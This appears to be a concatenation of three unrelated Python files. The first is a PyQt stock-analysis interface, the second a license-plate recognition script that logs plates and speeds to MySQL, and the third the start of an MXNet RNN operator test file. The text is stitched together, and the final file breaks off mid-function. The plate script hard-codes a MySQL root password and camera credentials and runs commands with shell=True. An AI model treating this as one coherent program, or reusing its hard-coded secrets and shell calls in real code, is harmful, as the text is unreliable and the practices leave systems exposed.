from StockAnalysisSystem.core.Utility.TableViewEx import *
from StockAnalysisSystem.core.Utility.time_utility import *
from StockAnalysisSystem.ui.Utility.ui_context import UiContext
from StockAnalysisSystem.core.Utility.resource_sync import ResourceTagUpdater, ResourceUpdateTask
# # ------------------------- Analysis Task -------------------------
#
# class AnalysisTask(TaskQueue.Task):
# OPTION_CALC = 1
# OPTION_FROM_CACHE = 2
# OPTION_UPDATE_CACHE = 16
# OPTION_AUTO = OPTION_CALC | OPTION_FROM_CACHE | OPTION_UPDATE_CACHE
#
# OPTION_LOAD_JSON = 1024
# OPTION_DUMP_JSON = 2048
# OPTION_LOAD_DUMP_ALL = 4096
#
# OPTION_ATTACH_BASIC_INDEX = 4096
#
# def __init__(self, ui, strategy_entry: StrategyEntry, data_hub: DataHubEntry,
# selector_list: [str], analyzer_list: [str], time_serial: tuple,
# options: int, report_path: str, progress_rate: ProgressRate):
# super(AnalysisTask, self).__init__('AnalysisTask')
# self.__ui = ui
# self.__options = options
# self.__data_hub = data_hub
# self.__strategy = strategy_entry
# self.__selector_list = selector_list
# self.__analyzer_list = analyzer_list
# self.__time_serial = time_serial
# self.__report_path = report_path
# self.__progress_rate = progress_rate
#
# def run(self):
# print('Analysis task start.')
#
# clock = Clock()
# stock_list = self.select()
# result_list = self.analysis(stock_list)
# stock_metrics = self.fetch_stock_metrics()
# self.gen_report(result_list, stock_metrics)
#
# print('Analysis task finished, time spending: ' + str(clock.elapsed_s()) + ' s')
#
# self.__ui.notify_task_done()
#
# def identity(self) -> str:
# return 'AnalysisTask'
#
# # -----------------------------------------------------------------------------
#
# def select(self) -> [str]:
# data_utility = self.__data_hub.get_data_utility()
# stock_list = data_utility.get_stock_identities()
# return stock_list
#
# def analysis(self, securities_list: [str]) -> [AnalysisResult]:
# clock_all = Clock()
# full_dump_path = os.path.join(StockAnalysisSystem().get_project_path(), 'TestData', 'analysis_result.json')
# if self.__options & AnalysisTask.OPTION_LOAD_JSON != 0 and \
# self.__options & AnalysisTask.OPTION_LOAD_DUMP_ALL != 0:
# clock_load = Clock()
# total_result = self.__strategy.load_analysis_report(full_dump_path)
# print('Load all analysis result finished, Time spending: %ss' % clock_load.elapsed_s())
# else:
# total_result = self.__strategy.analysis_advance(
# securities_list, self.__analyzer_list, self.__time_serial,
# self.__progress_rate,
# self.__options & AnalysisTask.OPTION_CALC != 0,
# self.__options & AnalysisTask.OPTION_FROM_CACHE != 0, self.__options & AnalysisTask.OPTION_UPDATE_CACHE != 0,
# self.__options & AnalysisTask.OPTION_LOAD_JSON != 0, self.__options & AnalysisTask.OPTION_DUMP_JSON != 0,
# os.path.join(StockAnalysisSystem().get_project_path(), 'TestData')
# )
#
# if self.__options & AnalysisTask.OPTION_DUMP_JSON != 0 and \
# self.__options & AnalysisTask.OPTION_LOAD_DUMP_ALL != 0:
# clock_dump = Clock()
# name_dict_path = os.path.join(StockAnalysisSystem().get_project_path(),
# 'TestData', 'analyzer_names.json')
# self.__strategy.dump_analysis_report(total_result, full_dump_path)
# self.__strategy.dump_strategy_name_dict(name_dict_path)
# print('Dump all analysis result finished, Time spending: %ss' % clock_dump.elapsed_s())
#
# print('All analysis finished, time spending: %ss' % clock_all.elapsed_s())
# return total_result
#
# def fetch_stock_metrics(self) -> pd.DataFrame or None:
# if self.__options & AnalysisTask.OPTION_ATTACH_BASIC_INDEX == 0:
# return None
#
# daily_metrics = None
# # daily_metrics = self.fetch_metrics_from_web()
# if not isinstance(daily_metrics, pd.DataFrame) or daily_metrics.empty:
# print('Fetch daily metrics data fail, use local.')
# daily_metrics = self.fetch_metrics_from_local()
#
# if not isinstance(daily_metrics, pd.DataFrame) or daily_metrics.empty:
# print('No metrics data.')
# return None
#
# if '_id' in daily_metrics.columns:
# del daily_metrics['_id']
# if 'trade_date' in daily_metrics.columns:
# del daily_metrics['trade_date']
#
# daily_metrics.columns = self.__data_hub.get_data_center().fields_to_readable(list(daily_metrics.columns))
#
# return daily_metrics
#
# def fetch_metrics_from_web(self) -> pd.DataFrame or None:
# trade_calender = self.__data_hub.get_data_center().query_from_plugin('Market.TradeCalender', exchange='SSE',
# trade_date=(days_ago(30), now()))
# if not isinstance(trade_calender, pd.DataFrame) or trade_calender.empty:
# print('Fetch trade calender from web fail.')
# return None
#
# trade_calender = trade_calender[trade_calender['status'] == 1]
# trade_calender = trade_calender.sort_values('trade_date', ascending=False)
# last_trade_date = trade_calender.iloc[1]['trade_date']
#
# daily_metrics = self.__data_hub.get_data_center().query_from_plugin(
# 'Metrics.Stock.Daily', trade_date=(last_trade_date, last_trade_date))
# return daily_metrics
#
# def fetch_metrics_from_local(self) -> pd.DataFrame or None:
# agent = self.__data_hub.get_data_center().get_data_agent('Metrics.Stock.Daily')
# if agent is None:
# print('No data agent for Metrics.Stock.Daily')
# return None
# since, until = agent.data_range('Metrics.Stock.Daily')
# if until is None:
# print('No local metrics data.')
# daily_metrics = self.__data_hub.get_data_center().query_from_local('Metrics.Stock.Daily',
# trade_date=(until, until))
# return daily_metrics
#
# def gen_report(self, result_list: [AnalysisResult], stock_metrics: pd.DataFrame or None):
# clock = Clock()
# self.__strategy.generate_report_excel_common(result_list, self.__report_path, stock_metrics)
# print('Generate report time spending: %ss' % str(clock.elapsed_s()))
#
#
# # ---------------------------------------------------- AnalyzerUi ----------------------------------------------------
class AnalyzerUi(QWidget):
# task_finish_signal = pyqtSignal()
TABLE_HEADER_SELECTOR = ['', 'Selector', 'Comments', 'UUID', 'Status']
TABLE_HEADER_ANALYZER = ['', 'Strategy', 'Comments', 'UUID', 'Status']
def __init__(self, context: UiContext):
super(AnalyzerUi, self).__init__()
self.__context = context
self.__analyzer_info = []
# Thread and task related
self.__selector_list = []
self.__analyzer_list = []
self.__result_output = os.getcwd()
self.__timing_clock = Clock()
# self.task_finish_signal.connect(self.__on_task_done)
# self.__task_res_id = []
self.__current_update_task = None
# Timer for update status
self.__timer = QTimer()
self.__timer.setInterval(1000)
self.__timer.timeout.connect(self.on_timer)
self.__timer.start()
# UI related
group, layout = create_v_group_box('Selector')
self.__group_selector = group
self.__layout_selector = layout
group, layout = create_v_group_box('Analyzer')
self.__group_analyzer = group
self.__layout_analyzer = layout
group, layout = create_v_group_box('Option')
self.__group_option = group
self.__layout_option = layout
group, layout = create_h_group_box('Result')
self.__group_result = group
self.__layout_result = layout
self.__table_selector = TableViewEx()
self.__table_analyzer = TableViewEx()
# self.__radio_group_selector = QButtonGroup(self)
# self.__radio_all = QRadioButton('All')
# self.__radio_tags = QRadioButton('Tags')
# self.__radio_manual = QRadioButton('Manual')
# self.__table_preview = QTableWidget()
self.__check_force_calc = QCheckBox('Force Calc')
self.__check_auto_cache = QCheckBox('Cache Result')
self.__check_load_json = QCheckBox('Load Json')
self.__check_dump_json = QCheckBox('Dump Json')
self.__check_load_dump_all = QCheckBox('Load/Dump All')
self.__datetime_time_since = QDateTimeEdit(years_ago(5))
self.__datetime_time_until = QDateTimeEdit(now())
self.__edit_path = QLineEdit('analysis_report.xlsx')
self.__button_browse = QPushButton('Browse')
self.__button_selector = QPushButton('Selector')
self.__button_analyzer = QPushButton('Analyzer')
self.__button_result = QPushButton('Result')
self.__button_run_strategy = QPushButton('Run Strategy')
self.__check_attach_basic_index = QCheckBox('Attach Basic Index')
self.init_ui()
self.update_selector()
self.update_analyzer()
self.post_progress_updater()
# ---------------------------------------------------- UI Init -----------------------------------------------------
def init_ui(self):
self.__layout_control()
self.__config_control()
def __layout_control(self):
main_layout = QVBoxLayout()
self.setLayout(main_layout)
self.setMinimumSize(600, 400)
self.__layout_selector.addWidget(self.__table_selector)
main_layout.addWidget(self.__group_selector)
self.__layout_analyzer.addWidget(self.__table_analyzer)
main_layout.addWidget(self.__group_analyzer)
self.__layout_result.addWidget(self.__edit_path)
self.__layout_result.addWidget(self.__button_browse)
main_layout.addWidget(self.__group_result)
grid_layout = QGridLayout()
grid_layout.addWidget(self.__check_force_calc, 0, 0)
grid_layout.addWidget(self.__check_auto_cache, 1, 0)
grid_layout.addWidget(self.__check_load_json, 0, 1)
grid_layout.addWidget(self.__check_dump_json, 1, 1)
grid_layout.addWidget(QLabel(' '), 0, 2)
grid_layout.addWidget(QLabel(' '), 0, 2)
grid_layout.addWidget(QLabel('Since'), 0, 3)
grid_layout.addWidget(QLabel('Until'), 1, 3)
grid_layout.addWidget(self.__datetime_time_since, 0, 4)
grid_layout.addWidget(self.__datetime_time_until, 1, 4)
grid_layout.addWidget(self.__check_attach_basic_index, 2, 0, 3, 1)
grid_layout.addWidget(self.__check_load_dump_all, 2, 1, 3, 1)
self.__layout_option.addLayout(grid_layout)
main_layout.addWidget(self.__group_option)
bottom_control_area = QHBoxLayout()
main_layout.addLayout(bottom_control_area)
bottom_control_area.addWidget(QLabel('Strategy Flow: '), 99)
bottom_control_area.addWidget(self.__button_selector)
bottom_control_area.addWidget(QLabel('==>'))
bottom_control_area.addWidget(self.__button_analyzer)
bottom_control_area.addWidget(QLabel('==>'))
bottom_control_area.addWidget(self.__button_result)
bottom_control_area.addWidget(QLabel(' | '))
bottom_control_area.addWidget(self.__button_run_strategy)
def __config_control(self):
self.__table_selector.SetCheckableColumn(0)
self.__table_selector.SetColumn(AnalyzerUi.TABLE_HEADER_SELECTOR)
self.__table_selector.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.__table_analyzer.SetCheckableColumn(0)
self.__table_analyzer.SetColumn(AnalyzerUi.TABLE_HEADER_ANALYZER)
self.__table_analyzer.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.__check_auto_cache.setChecked(True)
self.__datetime_time_since.setCalendarPopup(True)
self.__datetime_time_until.setCalendarPopup(True)
self.__check_force_calc.setToolTip('勾选此项后,程序将不会从缓存中读取分析结果,并强制进行实时计算。')
self.__check_auto_cache.setToolTip('勾选此项后,程序会自动缓存分析结果到SasCache数据库')
self.__check_load_json.setToolTip('仅供Debug:从JSON文件中载入分析结果')
self.__check_dump_json.setToolTip('仅供Debug:将分析结果写入JSON文件中')
self.__check_load_dump_all.setToolTip('仅供Debug:载入/保存所有结果而不是按Analyzer分别载入/保存')
self.__layout_selector.setSpacing(0)
self.__layout_analyzer.setSpacing(0)
self.__layout_option.setSpacing(0)
self.__layout_result.setSpacing(0)
self.__layout_selector.setContentsMargins(0, 0, 0, 0)
self.__layout_analyzer.setContentsMargins(0, 0, 0, 0)
# self.__layout_result.setContentsMargins(0, 0, 0, 0)
self.__button_result.clicked.connect(self.on_button_browse)
self.__button_browse.clicked.connect(self.on_button_browse)
self.__button_selector.clicked.connect(self.on_button_selector)
self.__button_analyzer.clicked.connect(self.on_button_analyzer)
self.__button_run_strategy.clicked.connect(self.on_button_run_strategy)
def on_button_browse(self):
file_path, ok = QFileDialog.getSaveFileName(self, 'Select Result Excel Path', '',
'XLSX Files (*.xlsx);;All Files (*)')
if ok:
self.__edit_path.setText(file_path)
def on_button_selector(self):
self.__group_selector.setVisible(True)
self.__group_analyzer.setVisible(not self.__group_analyzer.isVisible())
def on_button_analyzer(self):
self.__group_analyzer.setVisible(True)
self.__group_selector.setVisible(not self.__group_selector.isVisible())
def on_button_run_strategy(self):
selector_list = []
analyzer_list = []
output_path = self.__edit_path.text()
if len(output_path.strip()) == 0:
QMessageBox.information(self,
QtCore.QCoreApplication.translate('', '配置缺失'),
QtCore.QCoreApplication.translate('', '请指定结果输出文件'),
QMessageBox.Close, QMessageBox.Close)
for i in range(self.__table_analyzer.RowCount()):
if self.__table_analyzer.GetItemCheckState(i, 0) == QtCore.Qt.Checked:
uuid = self.__table_analyzer.GetItemText(i, 3)
analyzer_list.append(uuid)
if len(analyzer_list) == 0:
QMessageBox.information(None, '提示', '请至少选择一个分析方法')
return
self.__selector_list = selector_list
self.__analyzer_list = analyzer_list
self.__result_output = output_path
self.execute_update()
def on_timer(self):
if self.__current_update_task is None or self.__current_update_task.working():
return
total_progress = ProgressRate()
updater: ResourceTagUpdater = self.__current_update_task.get_updater()
updated_res_id = updater.get_resource_ids()
done_progress = []
for res_id in updated_res_id:
progress: ProgressRate = updater.get_resource(res_id, 'progress')
if progress is None:
continue
total_progress.combine_with(progress)
if progress.progress_done():
done_progress.append(res_id)
for i in range(self.__table_analyzer.RowCount()):
uuid = self.__table_analyzer.GetItemText(i, 3)
if total_progress.has_progress(uuid):
rate = total_progress.get_progress_rate(uuid)
self.__table_analyzer.SetItemText(i, 4, '%.2f%%' % (rate * 100))
else:
self.__table_analyzer.SetItemText(i, 4, '')
if len(updated_res_id) > 0:
if len(done_progress) != len(updated_res_id):
self.post_progress_updater()
else:
self.__context.get_sas_interface().sas_delete_resource(done_progress)
self.__current_update_task = None
# If progress done at process startup, do not pop up message box
self.__on_analysis_done()
# def closeEvent(self, event):
# if self.__task_thread is not None:
# QMessageBox.information(self,
# QtCore.QCoreApplication.translate('', '无法关闭窗口'),
# QtCore.QCoreApplication.translate('', '策略运行过程中无法关闭此窗口'),
# QMessageBox.Close, QMessageBox.Close)
# event.ignore()
# else:
# event.accept()
# --------------------------------------------------------------------------------------
def update_selector(self):
self.__table_selector.Clear()
self.__table_selector.SetRowCount(0)
self.__table_selector.SetColumn(AnalyzerUi.TABLE_HEADER_SELECTOR)
self.__table_selector.AppendRow(['', '所有股票', '当前只支持所有股票,不选默认也是所有股票', '-'])
# Add check box
# check_item = QTableWidgetItem()
# check_item.setCheckState(QtCore.Qt.Unchecked)
# self.__table_selector.setItem(0, 0, check_item)
def update_analyzer(self):
self.__table_analyzer.Clear()
self.__table_analyzer.SetRowCount(0)
self.__table_analyzer.SetColumn(AnalyzerUi.TABLE_HEADER_ANALYZER)
self.__analyzer_info = self.__context.get_sas_interface().sas_get_analyzer_probs()
# if len(self.__analyzer_info) == 0:
# self.__analyzer_info = self.__context.get_sas_interface().sas_get_analyzer_probs()
#
for prob in self.__analyzer_info:
line = [
'', # Place holder for check box
prob.get('name', ''),
prob.get('detail', ''),
prob.get('uuid', ''),
'', # Place holder for status
]
self.__table_analyzer.AppendRow(line)
# index = self.__table_analyzer.RowCount() - 1
# Add check box
# check_item = QTableWidgetItem()
# check_item.setCheckState(QtCore.Qt.Unchecked)
# self.__table_analyzer.setItem(index, 0, check_item)
# --------------------------------------------------------------------------
# def load_analyzer_info(self) -> [(str, str, str)]:
# info = []
# probs = self.__strategy_entry.strategy_prob()
# for prob in probs:
# methods = prob.get('methods', [])
# for method in methods:
# method_uuid = method[0]
# method_name = method[1]
# method_detail = method[2]
# method_entry = method[3]
# if method_entry is not None and '测试' not in method_name:
# # Notice the item order
# info.append([method_uuid, method_name, method_detail])
# return info
# --------------------------------- Thread ---------------------------------
def execute_update(self):
# options = AnalysisTask.OPTION_CALC
#
# if not self.__check_force_calc.isChecked():
# options |= AnalysisTask.OPTION_FROM_CACHE
#
# if self.__check_auto_cache.isChecked():
# options |= AnalysisTask.OPTION_UPDATE_CACHE
#
# if self.__check_load_json.isChecked():
# options |= AnalysisTask.OPTION_LOAD_JSON
# if self.__check_dump_json.isChecked():
# options |= AnalysisTask.OPTION_DUMP_JSON
# if self.__check_load_dump_all.isChecked():
# options |= AnalysisTask.OPTION_LOAD_DUMP_ALL
#
# if self.__check_attach_basic_index.isChecked():
# options |= AnalysisTask.OPTION_ATTACH_BASIC_INDEX
time_serial = (to_py_datetime(self.__datetime_time_since.dateTime()),
to_py_datetime(self.__datetime_time_until.dateTime()))
# self.__timing_clock.reset()
# task = AnalysisTask(self, self.__strategy_entry, self.__data_hub_entry,
# self.__selector_list, self.__analyzer_list, time_serial,
# options, self.__result_output, self.__progress_rate)
# StockAnalysisSystem().get_task_queue().append_task(task)
securities = self.__context.get_sas_interface().sas_get_stock_identities()
self.__context.get_sas_interface().sas_execute_analysis(
securities, self.__analyzer_list, time_serial,
enable_from_cache=not self.__check_force_calc.isChecked(),
enable_update_cache=self.__check_auto_cache.isChecked(),
debug_load_json=self.__check_load_json.isChecked(),
debug_dump_json=self.__check_dump_json.isChecked() or self.__check_load_dump_all.isChecked(),
dump_path=self.__result_output,
attach_basic_index=self.__check_attach_basic_index.isChecked(),
generate_report=True, # The report will be generated on server side.
)
self.post_progress_updater()
# self.__task_res_id.append(res_id)
# self.__context.get_res_sync().add_sync_resource(res_id, 'progress')
# if self.__task_thread is None:
# self.__task_thread = threading.Thread(target=self.ui_task)
# StockAnalysisSystem().lock_sys_quit()
# self.__timing_clock.reset()
# self.__task_thread.start()
# else:
# print('Task already running...')
# QMessageBox.information(self,
# QtCore.QCoreApplication.translate('', '无法执行'),
# QtCore.QCoreApplication.translate('', '已经有策略在运行中,无法同时运行多个策略'),
# QMessageBox.Close, QMessageBox.Close)
# def ui_task(self):
# print('Strategy task start.')
#
# self.__lock.acquire()
# selector_list = self.__selector_list
# analyzer_list = self.__analyzer_list
# output_path = self.__result_output
# self.__lock.release()
#
# data_utility = self.__data_hub_entry.get_data_utility()
# stock_list = data_utility.get_stock_identities()
#
# self.__progress_rate.reset()
#
# # ------------- Run analyzer -------------
# clock = Clock()
#
# # result = self.__strategy_entry.run_strategy(stock_list, analyzer_list, progress=self.__progress_rate)
#
# total_result = []
# uncached_analyzer = []
#
# for analyzer in analyzer_list:
# result = self.__strategy_entry.result_from_cache('Result.Analyzer', analyzer=analyzer)
# if result is None or len(result) == 0:
# uncached_analyzer.append(analyzer)
# result = self.__strategy_entry.run_strategy(stock_list, [analyzer], progress=self.__progress_rate)
# else:
# self.__progress_rate.finish_progress(analyzer)
# if result is not None and len(result) > 0:
# total_result.extend(result)
#
# # DEBUG: Load result from json file
# # result = None
# # with open('analysis_result.json', 'rt') as f:
# # result = analysis_results_from_json(f)
# # if result is None:
# # return
#
# print('Analysis time spending: ' + str(clock.elapsed_s()) + ' s')
#
# # # DEBUG: Dump result to json file
# # with open('analysis_result.json', 'wt') as f:
# # analysis_results_to_json(result, f)
#
# # self.__strategy_entry.cache_analysis_result('Result.Analyzer', result)
# result2 = self.__strategy_entry.result_from_cache('Result.Analyzer')
# print(result2)
#
# result = analysis_result_dataframe_to_list(result2)
# print(result)
#
# # ------------ Parse to Table ------------
#
# result_table = analysis_result_list_to_analyzer_security_table(result)
#
# # ----------- Generate report ------------
# clock.reset()
# stock_list = self.__data_hub_entry.get_data_utility().get_stock_list()
# stock_dict = {_id: _name for _id, _name in stock_list}
# name_dict = self.__strategy_entry.strategy_name_dict()
# generate_analysis_report(result_table, output_path, name_dict, stock_dict)
# print('Generate report time spending: ' + str(clock.elapsed_s()) + ' s')
#
# # ----------------- End ------------------
# self.task_finish_signal.emit()
# print('Update task finished.')
# ---------------------------------------------------------------------------------
# def notify_task_done(self):
# self.task_finish_signal.emit()
# def __on_task_done(self):
# # StockAnalysisSystem().release_sys_quit()
# QMessageBox.information(self,
# QtCore.QCoreApplication.translate('main', '远行完成'),
# QtCore.QCoreApplication.translate('main', '策略运行完成,耗时' +
# str(self.__timing_clock.elapsed_s()) + '秒\n' +
# '报告生成路径:' + self.__result_output),
# QMessageBox.Ok, QMessageBox.Ok)
def __on_analysis_done(self):
QMessageBox.information(self,
QtCore.QCoreApplication.translate('main', '分析完成'),
QtCore.QCoreApplication.translate('main', '策略运行完成,耗时' +
str(self.__timing_clock.elapsed_s()) + '秒\n' +
'请到服务目录下获取analysis_report.xlsx'),
QMessageBox.Ok, QMessageBox.Ok)
def post_progress_updater(self):
updater = ResourceTagUpdater(self.__context.get_sas_interface(), 'Analysis Progress Updater')
updater.set_resource_tags('analysis_task')
updater.set_update_resource_keys('progress')
update_task = ResourceUpdateTask(updater)
self.__context.get_task_queue().append_task(update_task)
self.__current_update_task = update_task
# ----------------------------------------------------------------------------------------------------------------------
def main():
from StockAnalysisSystem.interface.interface_local import LocalInterface
project_path = os.path.dirname(os.path.dirname(os.getcwd()))
local_if = LocalInterface()
local_if.if_init(project_path=project_path)
context = UiContext()
context.set_sas_interface(local_if)
app = QApplication(sys.argv)
dlg = WrapperQDialog(AnalyzerUi(context))
dlg.exec()
# ----------------------------------------------------------------------------------------------------------------------
def exception_hook(type, value, tback):
# log the exception here
print('Exception hook triggered.')
print(type)
print(value)
print(tback)
# then call the default handler
sys.__excepthook__(type, value, tback)
if __name__ == "__main__":
sys.excepthook = exception_hook
try:
main()
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
exit()
finally:
pass
|
datacapture.py
|
#mysql connection
from __future__ import print_function
from datetime import date, datetime, timedelta
import mysql.connector as mconn
from mysql.connector import errorcode as errcode
#program-related stuff
from subprocess import Popen, PIPE
import json
from pprint import pprint
import numpy as np
import cv2
import threading
#scan_plates()
#Executes a bash command, and returns output. As string. Probably.
def run(command):
process = Popen(command, stdout=PIPE, shell=True)
while True:
line = process.stdout.readline().rstrip()
if not line:
break
yield line
#def process_output(output):
#I know this is slow, but sorry man, I'm still noob at python.
#Optimized queries coming soon. xD
### RECORDS SPEED DATA INTO THE DATABASE ###
## Please put this in a background thread, at least. hahaha
def record_data(plate,speed):
cnx = mconn.connect(user='root',password='Rachel17.dopadopa',host='127.0.0.1',database='platecontainer')
cursor = cnx.cursor()
add_plates = ("INSERT INTO plate_record (plate_no,date_record,est_speed) values (%s,%s,%s) ON DUPLICATE KEY UPDATE date_record=%s,est_speed=%s")
data_plates = (plate,datetime.now(),speed,datetime.now(),speed)
cursor.execute(add_plates,data_plates)
cnx.commit()
cursor.close()
cnx.close()
### DEBUG CODE -- DO NOT ENABLE IF YOU DON'T KNOW WHAT YOU'RE DOING###
#def parse_json_data(output):
#def process_results(results):
#def disp_cam():
#cap = cv2.VideoCapture('http://192.168.254.105:8080/video')
#cap = cv2.VideoCapture('rtsp://admin:admin@192.168.0.108/live')
#while(cap.isOpened()):
#ret, frame = cap.read()
#gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#cv2.line(frame,(0,0),(511,511),(255,0,0),5)
#img = frame.array
#cv2.namedWindow("frame",cv2.WINDOW_NORMAL)
#cv2.resizeWindow('frame',520,520)
#cv2.imshow('frame',frame)
#if cv2.waitKey(1) & 0xFF == ord('q'):
# break
#cap.release()
#cv2.destroyAllWindows()
def scan_plates():
#Initialize the thread for capturing video stream.
#Adjust this according to the ip of the cam where you'll get your stream.
cap = cv2.VideoCapture('http://192.168.43.220:8080/video')#'http://192.168.254.106:8080/video')
#We use openalpr to detect the plates. this then returns valuable information
#which will be used and can be seen below.
for path in run("alpr -j -n 1 http://192.168.43.220:8080/video"):#http://192.168.254.106:8080/video"):
#decode the received response from the execution of the bash code above.
output = path.decode("utf-8")
#Initialize the video frame.
ret, frame = cap.read()
#gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if "connecting" in output:
print("Connecting to video stream...")
elif "connected" in output:
print("Connected to video stream. Checking plates.")
else:
#load the response string as JSON to become a list
#with keys which we can now access.
jsondata = json.loads(output)
#If there are results presented by openalpr, we process them
if jsondata["results"]:
for data in jsondata["results"]:
#We get the first result which is the highest confidence presented by openalpr.
results = data["candidates"][0]
#We then fetch the coordinates of the plate number detected.
coordinates = data["coordinates"]
#The coordinates presented has four points, which represent a four-sided polygon:
coord1 = coordinates[0]
coord2 = coordinates[1]
coord3 = coordinates[2]
coord4 = coordinates[3]
# Initialization of the coordinates extracted from openalpr.
# We initialize the coordinates as an array.
pts = np.array([(coord1["x"],coord1["y"]),(coord2["x"],coord2["y"]),(coord3["x"],coord3["y"]),(coord4["x"],coord4["y"])], np.int32)
pts = pts.reshape((-1,1,2))
#create a polygon with four vertices. Not necessary a rectangle, but yeah, a four-sided polygon.
cv2.polylines(frame,[pts],True,(255,0,0),thickness=2,lineType=8,shift=0)
#put text to the third coordinate, which is the lower left side of the rectangle
cv2.putText(frame,results["plate"],(coord4["x"],coord4["y"]),cv2.FONT_HERSHEY_TRIPLEX,1,1)
#save file to the folder where the script was executed
cv2.imwrite("img_"+results["plate"]+".jpg",frame)
#wrap the result to database then...
with open('spd.data', 'r') as myfile:
data=myfile.read().replace('\n', '')
data = data.strip()
speedval = float(data)
record_data(results["plate"],speedval)
### DEBUG CODE -- DO NOT ENABLE IF YOU DON'T KNOW WHAT YOU'RE DOING###
#cv2.rectangle(frame,(coord1["x"],coord1["y"]),(coord2["x"],coord2["y"]),(coord3["x"],coord3["y"]),5)
#print(coordinates[0]["x"])
### DEBUG CODE -- DO NOT ENABLE IF YOU DON'T KNOW WHAT YOU'RE DOING###
#cv2.line(frame,(0,0),(511,511),(255,0,0),5)
#img = frame.array
#cv2.namedWindow("Plate Number Scanner",cv2.WINDOW_NORMAL)
#cv2.resizeWindow('frame',520,520)
cv2.imshow('Plate Number Scanner',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
#print(path.decode("utf-8"))
cv2.line(frame,(0,0),(511,511),(255,0,0),5)
if __name__ == "__main__":
global frame
#global cnx
#global cursor
### DEBUG CODE -- DO NOT ENABLE IF YOU DON'T KNOW WHAT YOU'RE DOING###
#t1 = threading.Thread(target=scan_plates)
#t1.daemon = False
#t1.start()
# I call both these things at the main thread for performance. hehe.
#initialize_database()
scan_plates()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import xfail_when_nonstandard_decimal_separator, with_environment
import pytest
import os
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym._bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
